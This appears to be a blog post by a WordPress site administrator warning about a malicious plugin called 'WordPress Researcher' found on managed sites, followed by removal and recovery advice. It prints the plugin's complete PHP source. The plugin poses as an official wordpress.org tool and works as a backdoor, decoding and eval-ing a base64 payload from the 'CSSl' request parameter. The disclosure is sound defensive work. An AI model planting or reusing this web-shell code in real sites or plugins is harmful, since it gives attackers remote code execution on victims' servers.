WordPress is the most popular CMS in the world (hopefully that won't start a flame war like "PHP is the best language"), so it naturally gets "special treatment" from attackers. Recently, on several WordPress sites I manage, a plugin appeared out of nowhere, named "WordPress Researcher". At first glance the name looks perfectly ordinary, but a closer look at the source shows it is unmistakably a backdoor plugin. The code is very simple, yet it plants a backdoor in our WordPress installation: any request carrying a base64-encoded PHP payload in the "CSSl" parameter gets executed on the server. Delete it without hesitation! The plugin source file follows; judge for yourselves.
<?php
/*
Plugin Name: WordPress Researcher
Plugin URI: http://wordpress.org/extend/plugins/
Description: WordPress research tool.
Author: wordpressdotorg
Author URI: http://wordpress.org/
Text Domain: wordpress-researcher
License: GPL version 2 or later - http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
Version: 2.2.4
Copyright 2013 wordpressdotorg
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110, USA
*/
function research_plugin(){
    // Backdoor: if any request (GET, POST or cookie) carries a "CSSl" parameter,
    // base64-decode it and execute the result as PHP with the web server's privileges.
    if (isset($_REQUEST['CSSl'])){
        eval(base64_decode($_REQUEST['CSSl']));
    }
    return;
}
add_action('after_setup_theme', 'research_plugin');
?>
Installed alongside the WordPress Researcher plugin was another plugin, "Extend Calendar"; judging by its code it is nothing good either, so delete it as well. Then upgrade your WordPress version and change the admin password. If you still aren't comfortable, download the whole site's code and compare it against an earlier backup to check whether any other files were modified by the plugin.